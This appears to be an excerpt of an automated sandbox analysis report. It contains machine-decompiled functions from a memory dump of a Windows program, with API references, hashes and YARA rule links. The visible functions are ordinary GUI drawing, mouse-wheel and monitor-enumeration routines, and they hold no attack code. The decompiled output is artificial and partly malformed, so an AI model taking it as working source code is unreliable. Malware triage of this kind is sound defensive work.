VarNot, xrefs: 0040DDDF
VarCmp, xrefs: 0040DEBB
VarR4FromStr, xrefs: 0040DEE7
VarDiv, xrefs: 0040DE37
VarCyFromStr, xrefs: 0040DF29
VarXor, xrefs: 0040DEA5
VarBstrFromBool, xrefs: 0040DF81
VarI4FromStr, xrefs: 0040DED1
VarBstrFromDate, xrefs: 0040DF6B
VarNeg, xrefs: 0040DDC9
VarIdiv, xrefs: 0040DE4D
VarMul, xrefs: 0040DE21
VarBoolFromStr, xrefs: 0040DF3F
VarAnd, xrefs: 0040DE79
VarR8FromStr, xrefs: 0040DEFD
VarAdd, xrefs: 0040DDF5
oleaut32.dll, xrefs: 0040DDA0
VarBstrFromCy, xrefs: 0040DF55
VarMod, xrefs: 0040DE63
VarSub, xrefs: 0040DE0B

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
API String ID: 1646373207-1918263038
Opcode ID: 593b0a33b4a5ce258aef94eb9a31bea47b3bfcd34d5e3e65081b7b114f23eaed
Instruction ID: 3e0bcc79afc7f6fd1e2b6837307fa51303a95f5e24da0ace6ee65c6b7e785c49
Opcode Fuzzy Hash: 593b0a33b4a5ce258aef94eb9a31bea47b3bfcd34d5e3e65081b7b114f23eaed
Instruction Fuzzy Hash: 4141D7A1E046045AD3086BEE680193A77E9DB847147A0C47FF408BB7E5EF7CACC9466D

Uniqueness

Uniqueness Score: -1.00%

Function 0041DC50, Relevance: 24.2, APIs: 16, Instructions: 248
windowCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0041DC50(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x47a114; // 0x4790c8
				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L00406484();
					_v20 = E0041DAAC(0);
					_push(_t177);
					_push(0x41ded0);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L0040647C();
					_v24 = E0041DAAC(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x47b8a8; // 0x93080724
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L004065AC();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L004065AC();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x47b8a8; // 0x93080724
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L004065AC();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L004065AC();
						_v40 = _t135;
					}
					_push(_v20);
					L00406584();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(0x41ded7);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L004065AC();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L0040647C();
					_v24 = E0041DAAC(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x41dd23);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00406B44(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(0x41ded7);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}

0x0041dc51
0x0041dc53
0x0041dc59
0x0041dc5c
0x0041dc5f
0x0041dc61
0x0041dc64
0x0041dc67
0x0041dc6b
0x0041dc73
0x0041dd2c
0x0041dd2f
0x0041dd31
0x0041dd3b
0x0041dd40
0x0041dd41
0x0041dd46
0x0041dd49
0x0041dd4c
0x0041dd4d
0x0041dd51
0x0041dd52
0x0041dd5c
0x0041dd6c
0x0041dd6f
0x0041dd71
0x0041dd76
0x0041dd77
0x0041dd7a
0x0041dd7b
0x0041dd80
0x0041dd83
0x0041dd88
0x0041dd8c
0x0041dd8d
0x0041dd96
0x0041ddac
0x0041ddae
0x0041ddb3
0x0041ddb4
0x0041ddb7
0x0041ddb8
0x0041ddbd
0x0041dd98
0x0041dd98
0x0041dd9d
0x0041dd9e
0x0041dda1
0x0041dda2
0x0041dda7
0x0041dda7
0x0041ddc3
0x0041ddc4
0x0041dde6
0x0041de08
0x0041de15
0x0041de23
0x0041de4a
0x0041de6f
0x0041de79
0x0041de83
0x0041de8c
0x0041de96
0x0041de96
0x0041de9f
0x0041dea6
0x0041dea9
0x0041deac
0x0041deb5
0x0041deb7
0x0041debc
0x0041dec0
0x0041dec1
0x0041dec1
0x0041decf
0x0041dc8b
0x0041dc8b
0x0041dc8d
0x0041dc92
0x0041dc93
0x0041dc9d
0x0041dcad
0x0041dcb2
0x0041dcb3
0x0041dcb8
0x0041dcbb
0x0041dcf7
0x0041dcfe
0x0041dd01
0x0041dd04
0x0041dd16
0x0041dd22
0x0041dd22

APIs

SelectObject.GDI32(?,?), ref: 0041DCA8
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0041DD23,?,?), ref: 0041DCF7
SelectObject.GDI32(?,?), ref: 0041DD11
DeleteObject.GDI32(?), ref: 0041DD1D
SelectObject.GDI32(?,?), ref: 0041DD67
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0041DDE6
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0041DE08
SetTextColor.GDI32(?,00000000), ref: 0041DE10
SetBkColor.GDI32(?,00FFFFFF), ref: 0041DE1E
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0041DE4A
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0041DE6F
SetTextColor.GDI32(?,?), ref: 0041DE79
SetBkColor.GDI32(?,?), ref: 0041DE83
SelectObject.GDI32(?,00000000), ref: 0041DE96
DeleteObject.GDI32(?), ref: 0041DE9F
DeleteDC.GDI32(?), ref: 0041DECA

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Object$ColorSelectStretch$Delete$Text$Mask
String ID:
API String ID: 326492243-0
Opcode ID: 6b0125d6de173ff0cc9ad1a9e273166aca7a30e185f9d346467ffb0408cc5115
Instruction ID: fab36617edda2c30c748fa97848ec24cb73c50c36d52c70e631140480a0774a6
Opcode Fuzzy Hash: 6b0125d6de173ff0cc9ad1a9e273166aca7a30e185f9d346467ffb0408cc5115
Instruction Fuzzy Hash: 6881A3B1A00209AFDB50EFA9CD81EAF77FCAB0C714F110519F618E7281C679ED508B69

Uniqueness

Uniqueness Score: -1.00%

Function 00406C3C, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61
registryclipboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406C3C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}

0x00406c43
0x00406c45
0x00406c47
0x00406c59
0x00406c68
0x00406c74
0x00406c80
0x00406c85
0x00406ca4
0x00406c8b
0x00406c9b
0x00406c9b
0x00406ca9
0x00406cc6
0x00406caf
0x00406cbf
0x00406cbf
0x00406cd3

APIs

FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 00406C54
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 00406C60
RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 00406C6F
RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 00406C7B
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00406C93
SendMessageA.USER32(00000000,?,00000000,00000000), ref: 00406CB7

Strings

MSH_WHEELSUPPORT_MSG, xrefs: 00406C6A
MouseZ, xrefs: 00406C4F
MSWHEEL_ROLLMSG, xrefs: 00406C5B
Magellan MSWHEEL, xrefs: 00406C4A
MSH_SCROLL_LINES_MSG, xrefs: 00406C76

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: ClipboardFormatRegister$MessageSend$FindWindow
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 1416857345-3736581797
Opcode ID: c345612575ea4e5bb75eee646b4e3aa6f6b90dea58cd8c979432fc2cfaddd9d6
Instruction ID: 383e21380ea9402be74f673e7057eedc8ebae1c20e3cdcb7e96a5644b3f0fe3d
Opcode Fuzzy Hash: c345612575ea4e5bb75eee646b4e3aa6f6b90dea58cd8c979432fc2cfaddd9d6
Instruction Fuzzy Hash: BE114CB0244305AFF7009F65C941B66B7E8EF84710F22403BF886AB3C0D6B99C60CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041FBCC, Relevance: 18.2, APIs: 12, Instructions: 194
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0041FBCC(void* __eax, long __ecx, intOrPtr __edx) {
				void* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				void* _t64;
				int _t65;
				intOrPtr _t66;
				long _t77;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				long _t120;
				intOrPtr _t123;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t127 = _t129;
				_t130 = _t129 + 0xffffff90;
				_t120 = __ecx;
				_t123 = __edx;
				_t107 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E0041F0C0(_t107);
					_v12 = 0;
					_v20 = 0;
					_push(_t127);
					_push(0x41fdc7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_push(0);
					L0040677C();
					_v12 = E0041DAAC(0);
					_push(_v12);
					L00406484();
					_v20 = E0041DAAC(_v12);
					_push(0);
					_push(1);
					_push(1);
					_push(_v108);
					_t64 = _v112;
					_push(_t64);
					L0040646C();
					_v8 = _t64;
					if(_v8 == 0) {
						L17:
						_t65 = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
						_push(0x41fdce);
						if(_v20 != 0) {
							_t65 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							_t66 = _v12;
							_push(_t66);
							_push(0);
							L004069B4();
							return _t66;
						}
						return _t65;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(__ecx != 0x1fffffff) {
							_push(_v12);
							L00406484();
							_v16 = E0041DAAC(_v12);
							_push(_t127);
							_push(0x41fd7f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t130;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t107 = E0041F504(_t107, _t123, _t123, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t107);
							if(_t123 != 0) {
								_push(0);
								_push(_t123);
								_push(_v16);
								L004065AC();
								_push(_v16);
								L00406584();
								_push(0);
								_push(_t123);
								_push(_v20);
								L004065AC();
								_push(_v20);
								L00406584();
							}
							_t77 = SetBkColor(_v16, _t120);
							_push(0xcc0020);
							_push(0);
							_push(0);
							_push(_v16);
							_push(_v108);
							_push(_v112);
							_push(0);
							_push(0);
							_push(_v20);
							L00406464();
							SetBkColor(_v16, _t77);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t107);
							}
							_pop(_t117);
							 *[fs:eax] = _t117;
							_push(0x41fd86);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L17;
						}
					}
				}
			}

0x0041fbcd
0x0041fbcf
0x0041fbd5
0x0041fbd7
0x0041fbd9
0x0041fbdd
0x0041fbe2
0x0041fdd7
0x0041fbfc
0x0041fbfe
0x0041fc05
0x0041fc0a
0x0041fc0f
0x0041fc10
0x0041fc15
0x0041fc18
0x0041fc1b
0x0041fc1d
0x0041fc27
0x0041fc2d
0x0041fc2e
0x0041fc38
0x0041fc3b
0x0041fc3d
0x0041fc3f
0x0041fc44
0x0041fc45
0x0041fc48
0x0041fc49
0x0041fc4e
0x0041fc55
0x0041fd99
0x0041fd99
0x0041fd9b
0x0041fd9e
0x0041fda1
0x0041fdaa
0x0041fdb0
0x0041fdb0
0x0041fdb9
0x0041fdbb
0x0041fdbe
0x0041fdbf
0x0041fdc1
0x00000000
0x0041fdc1
0x0041fdc6
0x0041fc5b
0x0041fc68
0x0041fc71
0x0041fc92
0x0041fc93
0x0041fc9d
0x0041fca2
0x0041fca3
0x0041fca8
0x0041fcab
0x0041fcb2
0x0041fcd2
0x0041fcb4
0x0041fcb4
0x0041fcba
0x0041fcce
0x0041fcce
0x0041fce0
0x0041fce5
0x0041fce7
0x0041fce9
0x0041fced
0x0041fcee
0x0041fcf6
0x0041fcf7
0x0041fcfc
0x0041fcfe
0x0041fd02
0x0041fd03
0x0041fd0b
0x0041fd0c
0x0041fd0c
0x0041fd16
0x0041fd1d
0x0041fd22
0x0041fd24
0x0041fd29
0x0041fd2d
0x0041fd31
0x0041fd32
0x0041fd34
0x0041fd39
0x0041fd3a
0x0041fd44
0x0041fd4d
0x0041fd57
0x0041fd57
0x0041fd60
0x0041fd63
0x0041fd63
0x0041fd6a
0x0041fd6d
0x0041fd70
0x0041fd7e
0x0041fc73
0x0041fc85
0x0041fd8a
0x0041fd94
0x0041fd94
0x00000000
0x0041fd8a
0x0041fc71
0x0041fc55

APIs

GetObjectA.GDI32(?,00000054,?), ref: 0041FBEF
72E7AC50.USER32(00000000,00000000,0041FDC7,?,?,00000054,?), ref: 0041FC1D
SelectObject.GDI32(?,00000000), ref: 0041FC63
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0041FC85
SelectObject.GDI32(?), ref: 0041FCDB
SetBkColor.GDI32(?), ref: 0041FD16
SetBkColor.GDI32(?,00000000), ref: 0041FD44
SelectObject.GDI32(?,00000000), ref: 0041FD57
DeleteObject.GDI32 ref: 0041FD63
DeleteDC.GDI32(?), ref: 0041FD79
SelectObject.GDI32(?,00000000), ref: 0041FD94
DeleteDC.GDI32(00000000), ref: 0041FDB0

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Object$Select$Delete$Color
String ID:
API String ID: 1817384775-0
Opcode ID: df99035b9c8b9383cb0f3573e06fd8db823bed49e12040458d141f2b1159f263
Instruction ID: df0fd280a3e210b11f18626dd50523609216d78c75682d83d04e631589580a02
Opcode Fuzzy Hash: df99035b9c8b9383cb0f3573e06fd8db823bed49e12040458d141f2b1159f263
Instruction Fuzzy Hash: BA512BB1E00209BFDB10EBE9DC46FEEB7FCAB08704F11446AB605E7281D67899558B58

Uniqueness

Uniqueness Score: -1.00%

Function 00422988, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00422988(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x47b93f != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x47b92c = E004223DC(7, _t60,  *0x47b92c, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}

0x00422991
0x00422994
0x0042299e
0x004229ce
0x004229d4
0x00422a90
0x00422a98
0x00422a98
0x004229dc
0x004229e1
0x004229ec
0x004229f7
0x004229fc
0x00422a65
0x00422a7d
0x00422a8e
0x00422a79
0x00422a79
0x00422a79
0x00000000
0x00422a65
0x00422a08
0x00422a17
0x00000000
0x00000000
0x00422a29
0x00422a41
0x00422a57
0x00000000
0x00000000
0x00422a5d
0x00422a5f
0x00422a5f
0x00000000
0x00000000
0x00000000
0x00000000
0x00422a41
0x004229b2
0x004229c7
0x00000000

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 004229C1
GetSystemMetrics.USER32(00000000), ref: 004229E6
GetSystemMetrics.USER32(00000001), ref: 004229F1
GetClipBox.GDI32(?,?), ref: 00422A03
GetDCOrgEx.GDI32(?,?), ref: 00422A10
OffsetRect.USER32(?,?,?), ref: 00422A29
IntersectRect.USER32(?,?,?), ref: 00422A3A
IntersectRect.USER32(?,?,?), ref: 00422A50

Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C

Strings

EnumDisplayMonitors, xrefs: 004229A0

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: e441daebd1664fe64bdea52d5b89fd401027e91a8efdba01f915c7ad8ea11489
Instruction ID: 980d00046ea4793bde311c4f4de0b388f028731dcfa80c61d925b726898bc026
Opcode Fuzzy Hash: e441daebd1664fe64bdea52d5b89fd401027e91a8efdba01f915c7ad8ea11489
Instruction Fuzzy Hash: B2312FB2A01219AFDB10DBA59D45AFF77FCEB08300F404127FA25E2241E77899458BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004332C8, Relevance: 16.7, APIs: 11, Instructions: 224
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E004332C8(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _v64;
				struct HDC__* _t120;
				void* _t171;
				intOrPtr* _t193;
				intOrPtr* _t196;
				intOrPtr _t205;
				void* _t208;
				intOrPtr _t216;
				signed int _t234;
				void* _t237;
				void* _t239;
				intOrPtr _t240;

				_t237 = _t239;
				_t240 = _t239 + 0xffffffc4;
				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_t120 = E0043260C(_v8);
					_push(_t120);
					L00406874();
					_v16 = _t120;
					_push(_t237);
					_push(0x43352e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t240;
					GetClientRect(E0043260C(_v8),  &_v32);
					GetWindowRect(E0043260C(_v8),  &_v48);
					MapWindowPoints(0, E0043260C(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t208 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t208 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t208 = _t208 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t234 = GetWindowLongA(E0043260C(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t208;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t208;
						}
						if((_t234 & 0x00200000) != 0) {
							_t196 =  *0x479e84; // 0x47b910
							_v48.right = _v48.right +  *((intOrPtr*)( *_t196))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t208;
						}
						if((_t234 & 0x00100000) != 0) {
							_t193 =  *0x479e84; // 0x47b910
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t193))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x479a28 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x479a38 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x479a48 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x479a58 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E0041D068( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t216);
					 *[fs:eax] = _t216;
					_push(0x433535);
					_push(_v16);
					_t171 = E0043260C(_v8);
					_push(_t171);
					L004069B4();
					return _t171;
				} else {
					 *((intOrPtr*)( *_v8 - 0x10))();
					_t205 = E00425998(E004258B8());
					if(_t205 != 0) {
						_t205 = _v8;
						if(( *(_t205 + 0x52) & 0x00000002) != 0) {
							_t205 = E00425EC8(E004258B8(), 0, _v8);
						}
					}
					return _t205;
				}
			}

0x004332c9
0x004332cb
0x004332d1
0x004332d4
0x004332e1
0x004332f6
0x004332fb
0x004332fc
0x00433301
0x00433306
0x00433307
0x0043330c
0x0043330f
0x0043331f
0x00433331
0x00433347
0x0043335c
0x00433375
0x00433380
0x00433381
0x00433382
0x00433383
0x00433393
0x0043339e
0x0043339f
0x004333a0
0x004333a1
0x004333ac
0x004333b2
0x004333be
0x004333c3
0x004333c3
0x004333d3
0x004333d8
0x004333d8
0x004333ee
0x004333fa
0x004333fc
0x004333fc
0x00433409
0x0043340b
0x0043340b
0x00433418
0x0043341a
0x0043341a
0x00433423
0x00433427
0x00433430
0x00433430
0x0043343d
0x0043343f
0x0043343f
0x00433448
0x0043344c
0x00433455
0x00433455
0x004334b5
0x004334b5
0x004334ce
0x004334d9
0x004334da
0x004334db
0x004334dc
0x004334ed
0x00433509
0x00433510
0x00433513
0x00433516
0x0043351e
0x00433522
0x00433527
0x00433528
0x0043352d
0x00433535
0x0043353d
0x00433545
0x0043354c
0x0043354e
0x00433555
0x00433561
0x00433561
0x00433555
0x0043356c
0x0043356c

APIs

GetClientRect.USER32(00000000,?), ref: 0043331F
GetWindowRect.USER32(00000000,?), ref: 00433331
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00433347
OffsetRect.USER32(?,?,?), ref: 0043335C
ExcludeClipRect.GDI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00000002,00000000,?,00000000,0043352E), ref: 00433375
InflateRect.USER32(?,00000000,00000000), ref: 00433393
GetWindowLongA.USER32(00000000,000000F0), ref: 004333E9
DrawEdge.USER32(?,?,00000000,00000008), ref: 004334B5
IntersectClipRect.GDI32(?,?,?,?,?), ref: 004334CE
OffsetRect.USER32(?,?,?), ref: 004334ED
FillRect.USER32(?,?,00000000), ref: 00433509

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPoints
String ID:
API String ID: 1573515177-0
Opcode ID: dd5c2a34f4fbcdf76df79b6b7d2b8772f5761c490352404dce40c3bbbfdcd48f
Instruction ID: d40a58a42259eb0e890114817008824177fc0b92a19e48aa64e9657c0d1342cf
